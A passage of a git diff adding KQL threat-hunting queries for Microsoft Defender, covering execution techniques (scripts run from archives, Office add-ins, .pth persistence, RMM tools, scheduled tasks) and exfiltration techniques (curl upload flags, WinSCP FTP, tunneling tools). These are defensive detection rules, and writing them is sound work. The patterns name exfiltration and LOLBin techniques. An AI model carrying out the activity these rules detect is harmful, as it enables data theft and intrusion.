inline. This rule is targeted for hunting purposes. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not(((ProcessCommandLine contains ":\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "Tools\\Microsoft.VisualStudio.DevShell.dll") and (InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\cmd.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql new file mode 100644 index 00000000..cf46b317 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql @@ -0,0 +1,20 @@ +// Title: Manual Execution of Script Inside of a Compressed File +// Author: @kostastsale +// Date: 2023-02-15 +// Level: medium +// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. + +From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. + 1. Compressed file opened using 7zip. + 2. Compressed file opened using WinRar. + 3. Compressed file opened using native windows File Explorer capabilities. + +When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.threat-hunting +// False Positives: +// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results. + +DeviceProcessEvents +| where ((ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*" and InitiatingProcessFolderPath =~ "*\\7z*.exe") or ((ProcessCommandLine contains "\\AppData\\local\\temp*.rar\\" or ProcessCommandLine contains "\\AppData\\local\\temp*.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe") or (ProcessCommandLine =~ "*\\AppData\\local\\temp\\rar*\*" and InitiatingProcessFolderPath endswith "\\winrar.exe")) and ((ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".js" or ProcessCommandLine endswith ".jse" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".wsf" or ProcessCommandLine endswith ".wsh") and (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql new file mode 100644 index 00000000..d1b0df35 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Excel Add-In Loaded +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-12 +// Level: low +// Description: Detects Microsoft Excel loading an Add-In (.xll) file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, detection.threat-hunting +// False Positives: +// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs + +DeviceImageLoadEvents +| where FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql new file mode 100644 index 00000000..71f64ba2 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql @@ -0,0 +1,13 @@ +// Title: Microsoft Word Add-In Loaded +// Author: Steffen Rogge (dr0pd34d) +// Date: 2024-07-10 +// Level: low +// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, detection.threat-hunting +// False Positives: +// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs. + +DeviceImageLoadEvents +| where FolderPath endswith ".wll" and InitiatingProcessFolderPath endswith "\\winword.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql new file mode 100644 index 00000000..4ce07150 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql @@ -0,0 +1,17 @@ +// Title: Network Connection Initiated By PowerShell Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-13 +// Level: low +// Description: Detects a network connection that was initiated from a PowerShell process. +Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. +Use this rule as a basis for hunting for anomalies. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - Administrative scripts +// - Microsoft IP range +// - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range') + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (not((((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "51.103.210.0/23"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql new file mode 100644 index 00000000..daf9a923 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql @@ -0,0 +1,14 @@ +// Title: Potential BOINC Software Execution (UC-Berkeley Signature) +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: informational +// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. +This indicates it may be related to BOINC software and can be used maliciously if unauthorized. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting +// False Positives: +// - This software can be used for legitimate purposes when installed intentionally. + +DeviceProcessEvents +| where ProcessVersionInfoFileDescription =~ "University of California, Berkeley" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql new file mode 100644 index 00000000..c99aef84 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql @@ -0,0 +1,16 @@ +// Title: Potential File Override/Append Via SET Command +// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan) +// Date: 2024-08-22 +// Level: low +// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. +Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. +Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". +The typical use case of the "set /p=" command is to prompt the user for input. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts. + +DeviceProcessEvents +| where (ProcessCommandLine contains "/c set /p=" or ProcessCommandLine contains "\"set /p=" or (ProcessCommandLine contains ">>" and ProcessCommandLine contains "set /p=")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql new file mode 100644 index 00000000..18ae2197 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious PowerShell Child Processes +// Author: Florian Roth (Nextron Systems), Tim Shelton +// Date: 2022-04-26 +// Level: medium +// Description: Detects potentially suspicious child processes spawned by PowerShell. +Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts. + +DeviceProcessEvents +| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not(((ProcessCommandLine contains "-verifystore " and FolderPath endswith "\\certutil.exe") or ((ProcessCommandLine contains "qfe list" or ProcessCommandLine contains "diskdrive " or ProcessCommandLine contains "csproduct " or ProcessCommandLine contains "computersystem " or ProcessCommandLine contains " os " or ProcessCommandLine startswith "") and FolderPath endswith "\\wmic.exe")))) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql new file mode 100644 index 00000000..5a76cf68 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql @@ -0,0 +1,16 @@ +// Title: Process Execution From WebDAV Share +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-13 +// Level: low +// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares. +Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. +Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting +// False Positives: +// - Legitimate use of WebDAV shares for process execution +// - Known applications executing from WebDAV paths + +DeviceProcessEvents +| where FolderPath contains "\\DavWWWRoot\\" and FolderPath startswith "\\\\" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql new file mode 100644 index 00000000..dbe576c6 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql @@ -0,0 +1,15 @@ +// Title: Python Path Configuration File Creation - Linux +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents +| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql new file mode 100644 index 00000000..041a8a59 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql @@ -0,0 +1,15 @@ +// Title: Python Path Configuration File Creation - MacOS +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents +| where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql new file mode 100644 index 00000000..911fbaca --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql @@ -0,0 +1,15 @@ +// Title: Python Path Configuration File Creation - Windows +// Author: Andreas Braathen (mnemonic.io), Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents +| where (FolderPath endswith ".pth" and FolderPath matches regex "(?i)\\\\(venv|python(.+)?)\\\\lib\\\\site-packages\\\\") and (not((InitiatingProcessFolderPath endswith "\\python.exe" and (FolderPath endswith "\\pywin32.pth" or FolderPath endswith "\\distutils-precedence.pth")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql new file mode 100644 index 00000000..3fd52a07 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - Ammy Admin Agent Execution +// Author: @kostastsale +// Date: 2024-08-05 +// Level: medium +// Description: Detects the execution of the Ammy Admin RMM agent for remote management. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, detection.threat-hunting +// False Positives: +// - Legitimate use of Ammy Admin RMM agent for remote management by admins. + +DeviceProcessEvents +| where ProcessCommandLine contains "AMMYY\\aa_nts.dll\",run" and FolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql new file mode 100644 index 00000000..cf92648b --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql @@ -0,0 +1,13 @@ +// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer +// Author: @kostastsale +// Date: 2024-08-03 +// Level: medium +// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, detection.threat-hunting +// False Positives: +// - Legitimate use for admin activity. + +DeviceProcessEvents +| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "AVCore.exe\" -d" and InitiatingProcessFolderPath endswith "\\AVCore.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql new file mode 100644 index 00000000..d6bf6ad6 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-23 +// Level: medium +// Description: Detects remote binary or command execution via the ScreenConnect Service. +Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect + +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql new file mode 100644 index 00000000..739ff4e0 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql @@ -0,0 +1,12 @@ +// Title: Scheduled Task Created - FileCreation +// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team +// Date: 2023-09-27 +// Level: low +// Description: Detects the creation of a scheduled task via file creation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, attack.s0111, car.2013-08-001, detection.threat-hunting +// False Positives: +// - Normal behaviour on Windows + +DeviceFileEvents +| where FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\SysWOW64\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql new file mode 100644 index 00000000..8c575ce3 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql @@ -0,0 +1,12 @@ +// Title: Scheduled Task Created - Registry +// Author: Center for Threat Informed Defense (CTID) Summiting the Pyramid Team +// Date: 2023-09-27 +// Level: low +// Description: Detects the creation of a scheduled task via Registry keys. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.s0111, attack.t1053.005, car.2013-08-001, detection.threat-hunting +// False Positives: +// - Likely as this is a normal behaviour on Windows + +DeviceRegistryEvents +| where RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks*" or RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql new file mode 100644 index 00000000..c267b4c7 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql @@ -0,0 +1,14 @@ +// Title: Scheduled Task Creation From Potential Suspicious Parent Location +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-23 +// Level: medium +// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location. +Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting +// False Positives: +// - Software installers that run from temporary folders and also install scheduled tasks + +DeviceProcessEvents +| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\AppData\\Roaming\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "unattended.ini"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql new file mode 100644 index 00000000..ef3542a6 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql @@ -0,0 +1,14 @@ +// Title: Suspicious New Instance Of An Office COM Object +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-13 +// Level: medium +// Description: Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. +This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Legitimate usage of office automation via scripting + +DeviceProcessEvents +| where (FolderPath endswith "\\eqnedt32.exe" or FolderPath endswith "\\excel.exe" or FolderPath endswith "\\msaccess.exe" or FolderPath endswith "\\mspub.exe" or FolderPath endswith "\\powerpnt.exe" or FolderPath endswith "\\visio.exe" or FolderPath endswith "\\winword.exe") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql new file mode 100644 index 00000000..3f7f2608 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql @@ -0,0 +1,10 @@ +// Title: Unusually Long PowerShell CommandLine +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-06 +// Level: low +// Description: Detects unusually long PowerShell command lines with a length of 1000 characters or more +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting + +DeviceProcessEvents +| where ProcessCommandLine matches regex ".{1000,}" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows Powershell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql new file mode 100644 index 00000000..d2bb54ce --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql @@ -0,0 +1,10 @@ +// Title: WMI Module Loaded By Uncommon Process +// Author: Roberto Rodriguez @Cyb3rWard0g +// Date: 2019-08-10 +// Level: low +// Description: Detects WMI modules being loaded by an uncommon process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, detection.threat-hunting + +DeviceImageLoadEvents +| where (FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\WmiApRpl.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\WMINet_Utils.dll" or FolderPath endswith "\\wmiprov.dll" or FolderPath endswith "\\wmiutils.dll") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or (InitiatingProcessFolderPath endswith "\\WindowsAzureGuestAgent.exe" or InitiatingProcessFolderPath endswith "\\WaAppAgent.exe") or (InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\Update.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql new file mode 100644 index 00000000..675bc7a4 --- /dev/null +++ b/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql @@ -0,0 +1,12 @@ +// Title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript +// Author: Michael Haag +// Date: 2019-01-16 +// Level: medium +// Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.threat-hunting +// False Positives: +// - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. + +DeviceProcessEvents +| where (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql new file mode 100644 index 00000000..be2a82f7 --- /dev/null +++ b/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql @@ -0,0 +1,10 @@ +// Title: FTP Connection Open Attempt Via Winscp CLI +// Author: frack113 +// Date: 2025-10-12 +// Level: medium +// Description: Detects the execution of Winscp with the "-command" and the "open" flags in order to open an FTP connection. Akira ransomware was seen using this technique in order to exfiltrate data. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048, detection.threat-hunting + +DeviceProcessEvents +| where ((ProcessCommandLine contains "open " and ProcessCommandLine contains "ftp://") and (ProcessCommandLine contains "-command" or ProcessCommandLine contains "/command" or ProcessCommandLine contains "–command" or ProcessCommandLine contains "—command" or ProcessCommandLine contains "―command")) and (FolderPath endswith "\\WinSCP.exe" or ProcessVersionInfoOriginalFileName =~ "winscp.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql new file mode 100644 index 00000000..4202f810 --- /dev/null +++ b/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Data Exfiltration Via Curl.EXE +// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update) +// Date: 2020-07-03 +// Level: medium +// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting +// False Positives: +// - Scripts created by developers and admins + +DeviceProcessEvents +| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable")) and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql new file mode 100644 index 00000000..53f32716 --- /dev/null +++ b/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql @@ -0,0 +1,12 @@ +// Title: Tunneling Tool Execution +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1041, attack.t1572, attack.t1071.001, 